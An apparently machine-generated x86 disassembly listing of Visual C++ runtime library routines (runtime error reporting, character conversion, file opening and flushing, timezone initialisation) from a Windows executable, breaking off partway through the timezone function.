loc_4330F3: ; CODE XREF: sub_4330A0+44�j
cmp edx, 0FCh
jz loc_4331F0
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_43717C ; GetModuleFileNameA
test eax, eax
jnz short loc_43312A
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_42A5D0
pop ecx
pop ecx
loc_43312A: ; CODE XREF: sub_4330A0+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4293A0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_43316D
lea eax, [ebp+var_1A4]
push eax
call sub_4293A0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_429D10
add esp, 10h
loc_43316D: ; CODE XREF: sub_4330A0+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_42A5D0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_42A5E0
lea eax, [ebp+var_A0]
push offset asc_437D50 ; "\n\n"
push eax
call sub_42A5E0
push off_453A94[esi]
lea eax, [ebp+var_A0]
push eax
call sub_42A5E0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_434D70
add esp, 2Ch
pop edi
jmp short loc_4331F0
; ---------------------------------------------------------------------------
loc_4331CA: ; CODE XREF: sub_4330A0+3C�j
; sub_4330A0+4D�j
lea eax, [ebp+arg_0]
lea esi, off_453A94[esi]
push 0
push eax
push dword ptr [esi]
call sub_4293A0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_437200 ; GetStdHandle
push eax
call dword_437078 ; WriteFile
loc_4331F0: ; CODE XREF: sub_4330A0+2E�j
; sub_4330A0+59�j ...
pop esi
leave
retn
sub_4330A0 endp
; =============== S U B R O U T I N E =======================================
sub_4331F3 proc near ; CODE XREF: sub_42DB65+6C�p
; sub_42F3E2+32�p ...
arg_0 = dword ptr 4
inc dword_676920
push 1000h
call sub_4297B8
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_43321C
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_43322D
; ---------------------------------------------------------------------------
loc_43321C: ; CODE XREF: sub_4331F3+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_43322D: ; CODE XREF: sub_4331F3+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_4331F3 endp
; =============== S U B R O U T I N E =======================================
sub_433237 proc near ; CODE XREF: sub_42DB65+61�p
; sub_432104+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_676FE0
jb short loc_433246
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_433246: ; CODE XREF: sub_433237+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EE0[ecx*4]
mov al, [ecx+eax*4+4]
and eax, 40h
retn
sub_433237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433260 proc near ; CODE XREF: sub_42DC7D+2D4�p
; sub_42DC7D+6B3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EDC
push edi
push esi
call dword_437224 ; InterlockedIncrement
mov edi, dword_437220
xor ebx, ebx
cmp dword_676ED8, ebx
jz short loc_433290
push esi
call edi ; dword_437220
push 13h
call sub_42DAEF
pop ecx
push 1
pop ebx
loc_433290: ; CODE XREF: sub_433260+20�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4332B9
pop ecx
mov [ebp+arg_4], eax
test ebx, ebx
pop ecx
jz short loc_4332AE
push 13h
call sub_42DB50
pop ecx
jmp short loc_4332B1
; ---------------------------------------------------------------------------
loc_4332AE: ; CODE XREF: sub_433260+42�j
push esi
call edi ; dword_437220
loc_4332B1: ; CODE XREF: sub_433260+4C�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_433260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4332B9 proc near ; CODE XREF: sub_433260+36�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_4332C5
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4332C5: ; CODE XREF: sub_4332B9+8�j
cmp dword_6769A8, 0
jnz short loc_4332E0
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_433312
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4332E0: ; CODE XREF: sub_4332B9+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_4535C4
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_6769B8
call dword_437074 ; WideCharToMultiByte
test eax, eax
jz short loc_433312
cmp [ebp+arg_0], 0
jz short loc_433320
loc_433312: ; CODE XREF: sub_4332B9+1E�j
; sub_4332B9+51�j
call sub_42F119
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_433320: ; CODE XREF: sub_4332B9+57�j
pop ebp
retn
sub_4332B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433322 proc near ; CODE XREF: sub_42E5F5+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EDC
push edi
push esi
call dword_437224 ; InterlockedIncrement
mov edi, dword_437220
xor ebx, ebx
cmp dword_676ED8, ebx
jz short loc_433352
push esi
call edi ; dword_437220
push 13h
call sub_42DAEF
pop ecx
push 1
pop ebx
loc_433352: ; CODE XREF: sub_433322+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43337F
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_433374
push 13h
call sub_42DB50
pop ecx
jmp short loc_433377
; ---------------------------------------------------------------------------
loc_433374: ; CODE XREF: sub_433322+46�j
push esi
call edi ; dword_437220
loc_433377: ; CODE XREF: sub_433322+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_433322 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43337F proc near ; CODE XREF: sub_433322+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_4333A2
cmp [ebp+arg_8], ebx
jz short loc_4333A2
mov al, [esi]
cmp al, bl
jnz short loc_4333A8
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4333A2
mov [eax], bx
loc_4333A2: ; CODE XREF: sub_43337F+C�j
; sub_43337F+11�j ...
xor eax, eax
loc_4333A4: ; CODE XREF: sub_43337F+42�j
; sub_43337F+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4333A8: ; CODE XREF: sub_43337F+17�j
cmp dword_6769A8, ebx
jnz short loc_4333C3
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_4333BE
movzx ax, al
mov [ecx], ax
loc_4333BE: ; CODE XREF: sub_43337F+36�j
; sub_43337F+C1�j
push 1
pop eax
jmp short loc_4333A4
; ---------------------------------------------------------------------------
loc_4333C3: ; CODE XREF: sub_43337F+2F�j
mov ecx, off_4533B8
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_433421
mov eax, dword_4535C4
cmp eax, 1
jle short loc_433407
cmp [ebp+arg_8], eax
jl short loc_433411
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_6769B8
call dword_437184 ; MultiByteToWideChar
test eax, eax
mov eax, dword_4535C4
jnz short loc_4333A4
loc_433407: ; CODE XREF: sub_43337F+5C�j
cmp [ebp+arg_8], eax
jb short loc_433411
cmp [esi+1], bl
jnz short loc_4333A4
loc_433411: ; CODE XREF: sub_43337F+61�j
; sub_43337F+8B�j ...
call sub_42F119
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4333A4
; ---------------------------------------------------------------------------
loc_433421: ; CODE XREF: sub_43337F+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_6769B8
call dword_437184 ; MultiByteToWideChar
test eax, eax
jnz loc_4333BE
jmp short loc_433411
sub_43337F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_433450 proc near ; CODE XREF: sub_42E5F5+797�p
; sub_42E5F5+7E7�p
cmp cl, 40h
jnb short loc_43346A
cmp cl, 20h
jnb short loc_433460
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_433460: ; CODE XREF: sub_433450+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_43346A: ; CODE XREF: sub_433450+3�j
xor eax, eax
xor edx, edx
retn
sub_433450 endp
; =============== S U B R O U T I N E =======================================
sub_43346F proc near ; CODE XREF: sub_42F06B+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_4334BB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_43348D
test al, 80h
jz short loc_4334BB
test al, 2
jnz short loc_4334BB
loc_43348D: ; CODE XREF: sub_43346F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_43349A
push esi
call sub_4331F3
pop ecx
loc_43349A: ; CODE XREF: sub_43346F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_4334AA
cmp dword ptr [esi+4], 0
jnz short loc_4334BB
inc eax
mov [esi], eax
loc_4334AA: ; CODE XREF: sub_43346F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_4334C1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_4334C7
inc eax
mov [esi], eax
loc_4334BB: ; CODE XREF: sub_43346F+9�j
; sub_43346F+18�j ...
or eax, 0FFFFFFFFh
loc_4334BE: ; CODE XREF: sub_43346F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4334C1: ; CODE XREF: sub_43346F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_4334C7: ; CODE XREF: sub_43346F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_4334BE
sub_43346F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4334DD proc near ; CODE XREF: sub_42F12B+5E�p
; sub_43291B+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437D88
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_676B30
xor ebx, ebx
cmp eax, ebx
jnz short loc_43354C
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_437670
push esi
call dword_4371B8 ; GetStringTypeW
test eax, eax
jz short loc_43352A
mov eax, esi
jmp short loc_433547
; ---------------------------------------------------------------------------
loc_43352A: ; CODE XREF: sub_4334DD+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset word_454038
push esi
push ebx
call dword_4371BC ; GetStringTypeA
test eax, eax
jz loc_433612
push 2
pop eax
loc_433547: ; CODE XREF: sub_4334DD+4B�j
mov dword_676B30, eax
loc_43354C: ; CODE XREF: sub_4334DD+2F�j
cmp eax, 2
jnz short loc_433575
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_43355D
mov eax, dword_6769A8
loc_43355D: ; CODE XREF: sub_4334DD+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_4371BC ; GetStringTypeA
jmp loc_433614
; ---------------------------------------------------------------------------
loc_433575: ; CODE XREF: sub_4334DD+72�j
cmp eax, 1
jnz loc_433612
cmp [ebp+arg_10], ebx
jnz short loc_43358B
mov eax, dword_6769B8
mov [ebp+arg_10], eax
loc_43358B: ; CODE XREF: sub_4334DD+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_437184 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_433612
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_429B60
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_429760
add esp, 0Ch
jmp short loc_4335E1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4335E1: ; CODE XREF: sub_4334DD+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_433612
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_437184 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_433612
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_4371B8 ; GetStringTypeW
jmp short loc_433614
; ---------------------------------------------------------------------------
loc_433612: ; CODE XREF: sub_4334DD+61�j
; sub_4334DD+9B�j ...
xor eax, eax
loc_433614: ; CODE XREF: sub_4334DD+93�j
; sub_4334DD+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4334DD endp
; =============== S U B R O U T I N E =======================================
sub_433626 proc near ; CODE XREF: sub_42F2AB+1E�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, dword_676FE0
push esi
push edi
jnb short loc_4336A7
mov eax, ebx
sar eax, 5
lea edi, ds:676EE0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
test byte ptr [eax+esi+4], 1
jz short loc_4336A7
push ebx
call sub_43241B
mov eax, [edi]
pop ecx
test byte ptr [eax+esi+4], 1
jz short loc_43368E
push ebx
call sub_4323D9
pop ecx
push eax
call dword_4371B4 ; FlushFileBuffers
test eax, eax
jnz short loc_433681
call dword_437170 ; RtlGetLastWin32Error
mov esi, eax
jmp short loc_433683
; ---------------------------------------------------------------------------
loc_433681: ; CODE XREF: sub_433626+4F�j
xor esi, esi
loc_433683: ; CODE XREF: sub_433626+59�j
test esi, esi
jz short loc_43369C
call sub_42F122
mov [eax], esi
loc_43368E: ; CODE XREF: sub_433626+3D�j
call sub_42F119
mov dword ptr [eax], 9
or esi, 0FFFFFFFFh
loc_43369C: ; CODE XREF: sub_433626+5F�j
push ebx
call sub_43247A
pop ecx
mov eax, esi
jmp short loc_4336B5
; ---------------------------------------------------------------------------
loc_4336A7: ; CODE XREF: sub_433626+D�j
; sub_433626+2D�j
call sub_42F119
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_4336B5: ; CODE XREF: sub_433626+7F�j
pop edi
pop esi
pop ebx
retn
sub_433626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4336B9 proc near ; CODE XREF: sub_42F990+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_4336DF
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_4336EA
; ---------------------------------------------------------------------------
loc_4336DF: ; CODE XREF: sub_4336B9+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_4336EA: ; CODE XREF: sub_4336B9+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_433704
test ch, 40h
jnz short loc_433700
cmp dword_676C64, eax
jz short loc_433704
loc_433700: ; CODE XREF: sub_4336B9+3D�j
or [ebp+var_1], 80h
loc_433704: ; CODE XREF: sub_4336B9+38�j
; sub_4336B9+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_43372B
dec eax
jz short loc_433722
dec eax
jnz loc_4337BD
mov [ebp+var_C], 0C0000000h
jmp short loc_433732
; ---------------------------------------------------------------------------
loc_433722: ; CODE XREF: sub_4336B9+57�j
mov [ebp+var_C], 40000000h
jmp short loc_433732
; ---------------------------------------------------------------------------
loc_43372B: ; CODE XREF: sub_4336B9+54�j
mov [ebp+var_C], 80000000h
loc_433732: ; CODE XREF: sub_4336B9+67�j
; sub_4336B9+70�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_433760
cmp eax, 20h
jz short loc_433757
cmp eax, 30h
jz short loc_43374E
cmp eax, 40h
jnz short loc_4337BD
mov [ebp+var_10], esi
jmp short loc_433763
; ---------------------------------------------------------------------------
loc_43374E: ; CODE XREF: sub_4336B9+89�j
mov [ebp+var_10], 2
jmp short loc_433763
; ---------------------------------------------------------------------------
loc_433757: ; CODE XREF: sub_4336B9+84�j
mov [ebp+var_10], 1
jmp short loc_433763
; ---------------------------------------------------------------------------
loc_433760: ; CODE XREF: sub_4336B9+7F�j
mov [ebp+var_10], ebx
loc_433763: ; CODE XREF: sub_4336B9+93�j
; sub_4336B9+9C�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_4337A9
jz short loc_4337A4
cmp ecx, ebx
jz short loc_4337A4
cmp ecx, edi
jz short loc_43379B
cmp ecx, 200h
jz short loc_4337D7
cmp ecx, 300h
jnz short loc_4337BD
mov [ebp+var_8], 2
jmp short loc_4337E7
; ---------------------------------------------------------------------------
loc_43379B: ; CODE XREF: sub_4336B9+C7�j
mov [ebp+var_8], 4
jmp short loc_4337E7
; ---------------------------------------------------------------------------
loc_4337A4: ; CODE XREF: sub_4336B9+BF�j
; sub_4336B9+C3�j
mov [ebp+var_8], esi
jmp short loc_4337E7
; ---------------------------------------------------------------------------
loc_4337A9: ; CODE XREF: sub_4336B9+BD�j
cmp ecx, 500h
jz short loc_4337E0
cmp ecx, 600h
jz short loc_4337D7
cmp ecx, edx
jz short loc_4337E0
loc_4337BD: ; CODE XREF: sub_4336B9+5A�j
; sub_4336B9+8E�j ...
call sub_42F119
mov dword ptr [eax], 16h
call sub_42F122
mov [eax], ebx
or eax, 0FFFFFFFFh
jmp loc_433983
; ---------------------------------------------------------------------------
loc_4337D7: ; CODE XREF: sub_4336B9+CF�j
; sub_4336B9+FE�j
mov [ebp+var_8], 5
jmp short loc_4337E7
; ---------------------------------------------------------------------------
loc_4337E0: ; CODE XREF: sub_4336B9+F6�j
; sub_4336B9+102�j
mov [ebp+var_8], 1
loc_4337E7: ; CODE XREF: sub_4336B9+E0�j
; sub_4336B9+E9�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_433806
mov ecx, dword_6769CC
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_433806
push 1
pop esi
loc_433806: ; CODE XREF: sub_4336B9+138�j
; sub_4336B9+148�j
test al, 40h
jz short loc_433814
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_433814: ; CODE XREF: sub_4336B9+14F�j
test ah, 10h
jz short loc_43381B
or esi, edi
loc_43381B: ; CODE XREF: sub_4336B9+15E�j
test al, 20h
jz short loc_433827
or esi, 8000000h
jmp short loc_433831
; ---------------------------------------------------------------------------
loc_433827: ; CODE XREF: sub_4336B9+164�j
test al, 10h
jz short loc_433831
or esi, 10000000h
loc_433831: ; CODE XREF: sub_4336B9+16C�j
; sub_4336B9+170�j
call sub_4321BB
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_433859
call sub_42F119
mov dword ptr [eax], 18h
call sub_42F122
and dword ptr [eax], 0
mov eax, edi
jmp loc_433983
; ---------------------------------------------------------------------------
loc_433859: ; CODE XREF: sub_4336B9+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword_43705C ; CreateFileA
mov esi, eax
cmp esi, edi
jnz short loc_43388C
loc_433878: ; CODE XREF: sub_4336B9+1E5�j
call dword_437170 ; RtlGetLastWin32Error
push eax
call sub_42F0A6
pop ecx
mov esi, edi
jmp loc_43397A
; ---------------------------------------------------------------------------
loc_43388C: ; CODE XREF: sub_4336B9+1BD�j
push esi
call dword_4371F4 ; GetFileType
test eax, eax
jnz short loc_4338A0
push esi
call dword_437044 ; CloseHandle
jmp short loc_433878
; ---------------------------------------------------------------------------
loc_4338A0: ; CODE XREF: sub_4336B9+1DC�j
cmp eax, 2
jnz short loc_4338AB
or [ebp+var_1], 40h
jmp short loc_4338B4
; ---------------------------------------------------------------------------
loc_4338AB: ; CODE XREF: sub_4336B9+1EA�j
cmp eax, 3
jnz short loc_4338B4
or [ebp+var_1], 8
loc_4338B4: ; CODE XREF: sub_4336B9+1F0�j
; sub_4336B9+1F5�j
push esi
push ebx
call sub_4322DE
mov eax, ebx
pop ecx
sar eax, 5
pop ecx
mov cl, [ebp+var_1]
lea edi, ds:676EE0h[eax*4]
mov eax, ebx
or cl, 1
and eax, 1Fh
mov byte ptr [ebp+arg_0+3], cl
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
and byte ptr [ebp+arg_0+3], 48h
mov [eax+esi+4], cl
jnz short loc_433961
test cl, 80h
jz short loc_433961
test byte ptr [ebp+arg_4], 2
jz short loc_433961
push 2
push 0FFFFFFFFh
push ebx
call sub_42F91D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_433922
call sub_42F122
cmp dword ptr [eax], 83h
jz short loc_433961
loc_433916: ; CODE XREF: sub_4336B9+294�j
; sub_4336B9+2A6�j
push ebx
call sub_42F1A0
pop ecx
or esi, 0FFFFFFFFh
jmp short loc_43397A
; ---------------------------------------------------------------------------
loc_433922: ; CODE XREF: sub_4336B9+24E�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_42F523
add esp, 0Ch
test eax, eax
jnz short loc_43394F
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_43394F
push [ebp+var_10]
push ebx
call sub_434DF9
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_433916
loc_43394F: ; CODE XREF: sub_4336B9+27E�j
; sub_4336B9+284�j
push 0
push 0
push ebx
call sub_42F91D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_433916
loc_433961: ; CODE XREF: sub_4336B9+22E�j
; sub_4336B9+233�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_433978
test byte ptr [ebp+arg_4], 8
jz short loc_433978
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_433978: ; CODE XREF: sub_4336B9+2AC�j
; sub_4336B9+2B2�j
mov esi, ebx
loc_43397A: ; CODE XREF: sub_4336B9+1CE�j
; sub_4336B9+267�j
push ebx
call sub_43247A
pop ecx
mov eax, esi
loc_433983: ; CODE XREF: sub_4336B9+119�j
; sub_4336B9+19B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4336B9 endp
; =============== S U B R O U T I N E =======================================
sub_433988 proc near ; CODE XREF: sub_43046C:loc_4304AB�p
cmp dword_676BF0, 0
jnz short locret_4339B5
push 0Bh
call sub_42DAEF
cmp dword_676BF0, 0
pop ecx
jnz short loc_4339AD
call sub_4339B6
inc dword_676BF0
loc_4339AD: ; CODE XREF: sub_433988+18�j
push 0Bh
call sub_42DB50
pop ecx
locret_4339B5: ; CODE XREF: sub_433988+7�j
retn
sub_433988 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4339B6 proc near ; CODE XREF: sub_433988+1A�p
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
push 0Ch
pop edi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call sub_42DAEF
or dword_453BC8, 0FFFFFFFFh
or dword_453BB8, 0FFFFFFFFh
mov dword_676B38, ebx
mov [esp+18h+var_18], offset aTz ; "TZ"
call sub_4312E3
mov esi, eax
pop ecx
cmp esi, ebx
jnz loc_433AF4
push edi
call sub_42DB50
mov [esp+18h+var_18], offset dword_676B40
call dword_437218 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz loc_433C38
mov eax, dword_676B40
mov ecx, dword_676B94
imul eax, 3Ch
cmp word_676B86, bx
push 1
pop edx
mov dword_453B24, eax
mov dword_676B38, edx
jz short loc_433A44
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_453B24, eax
loc_433A44: ; CODE XREF: sub_4339B6+80�j
cmp word_676BDA, bx
jz short loc_433A68
mov eax, dword_676BE8
cmp eax, ebx
jz short loc_433A68
sub eax, ecx
mov dword_453B28, edx
imul eax, 3Ch
mov dword_453B2C, eax
jmp short loc_433A74
; ---------------------------------------------------------------------------
loc_433A68: ; CODE XREF: sub_4339B6+95�j
; sub_4339B6+9E�j
mov dword_453B28, ebx
mov dword_453B2C, ebx
loc_433A74: ; CODE XREF: sub_4339B6+B0�j
lea eax, [ebp+var_4]
mov esi, dword_437074
push eax
push ebx
push 3Fh
mov edi, 220h
push off_453BB0
push 0FFFFFFFFh
push offset dword_676B44
push edi
push dword_6769B8
call esi ; dword_437074
test eax, eax
jz short loc_433AB0
cmp [ebp+var_4], ebx
jnz short loc_433AB0
mov eax, off_453BB0
and byte ptr [eax+3Fh], 0
jmp short loc_433AB8
; ---------------------------------------------------------------------------
loc_433AB0: ; CODE XREF: sub_4339B6+E8�j
; sub_4339B6+ED�j
mov eax, off_453BB0
and byte ptr [eax], 0
loc_433AB8: ; CODE XREF: sub_4339B6+F8�j
lea eax, [ebp+var_4]
push eax
push ebx
push 3Fh
push off_453BB4
push 0FFFFFFFFh
push offset dword_676B98
push edi
push dword_6769B8
call esi ; dword_437074
test eax, eax
jz loc_433C27
cmp [ebp+var_4], ebx
jnz loc_433C27
mov eax, off_453BB4
and byte ptr [eax+3Fh], 0
jmp loc_433C38
; ---------------------------------------------------------------------------
loc_433AF4: ; CODE XREF: sub_4339B6+3B�j
cmp byte ptr [esi], 0
jz loc_433C31
mov eax, dword_676BEC
cmp eax, ebx
jz short loc_433B17
push eax
push esi
call sub_42B260
pop ecx
test eax, eax
pop ecx
jz loc_433C31
loc_433B17: ; CODE XREF: sub_4339B6+14E�j
push dword_676BEC
call sub_4298F2
push esi
call sub_4293A0
inc eax
push eax
call sub_4297B8
add esp, 0Ch
cmp eax, ebx
mov dword_676BEC, eax
jz loc_433C31
push esi
push eax
call sub_42A5D0
push edi
call sub_42DB50
push 3
push esi
push off_453BB0
call sub_429D10
mov eax, off_453BB0
add esi, 3
add esp, 18h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_433B76
mov [ebp+var_8], 1
inc esi
loc_433B76: ; CODE XREF: sub_4339B6+1B6�j
push esi
call sub_42A075
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_453B24, ecx
loc_433B8D: ; CODE XREF: sub_4339B6+1E6�j
mov al, [esi]
cmp al, 2Bh
jz short loc_433B9B
cmp al, bl
jl short loc_433B9E
cmp al, 39h
jg short loc_433B9E
loc_433B9B: ; CODE XREF: sub_4339B6+1DB�j
inc esi
jmp short loc_433B8D
; ---------------------------------------------------------------------------
loc_433B9E: ; CODE XREF: sub_4339B6+1DF�j
; sub_4339B6+1E3�j
cmp byte ptr [esi], 3Ah
jnz short loc_433BF1
inc esi
push esi
call sub_42A075
imul eax, 3Ch
pop ecx
mov ecx, dword_453B24
add ecx, eax
mov dword_453B24, ecx
loc_433BBC: ; CODE XREF: sub_4339B6+211�j
mov al, [esi]
cmp al, bl
jl short loc_433BC9
cmp al, 39h
jg short loc_433BC9
inc esi
jmp short loc_433BBC
; ---------------------------------------------------------------------------
loc_433BC9: ; CODE XREF: sub_4339B6+20A�j
; sub_4339B6+20E�j
